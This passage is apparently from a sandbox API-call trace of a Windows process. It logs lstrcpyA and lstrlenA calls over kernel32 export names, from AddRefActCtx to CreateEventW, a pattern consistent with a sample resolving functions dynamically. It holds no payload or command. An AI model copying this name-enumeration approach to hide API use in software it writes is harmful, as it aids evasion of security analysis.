lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.503] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.503] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.503] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.503] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.503] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.503] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.503] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.503] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.503] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.503] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.503] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.503] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.503] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.503] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.503] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.503] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.504] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.504] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.504] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.504] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.504] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.504] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.504] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.504] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.504] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.504] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.504] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.504] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.504] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.504] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.504] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.504] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.504] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.504] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.504] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.504] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.504] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.505] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.505] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.505] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.505] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.505] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.505] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.505] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.505] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.505] lstrlenA (lpString="BEEP") returned 4 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.505] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.505] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.505] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.505] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.505] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.505] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.505] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.505] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.505] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.505] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.505] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.505] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.506] lstrlenA (lpString="CANCELIO") returned 8 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.506] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.506] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.506] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.506] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.506] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.506] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.506] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.506] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.506] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.506] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.506] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.506] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.506] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.506] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.506] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.506] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.506] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.506] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.506] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.507] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.507] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.507] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.507] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.507] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.507] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.507] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.507] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.507] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.507] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.507] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.507] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.507] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.507] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.507] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.507] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.507] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.507] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.507] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.508] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.508] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.508] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.508] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.508] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.508] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.508] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.508] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.508] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.508] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.508] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.508] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.508] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.508] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.508] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.508] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.508] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.508] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.508] lstrlenA (lpString="COPYFILEA") returned 9 [0080.508] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.508] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.508] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.508] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.508] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.508] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.508] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.508] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.508] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.508] lstrlenA (lpString="COPYFILEW") returned 9 [0080.508] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.508] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.508] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.509] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.509] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.509] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.509] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.509] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.509] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.509] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.509] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.509] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.509] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.509] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.509] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.509] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.509] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" 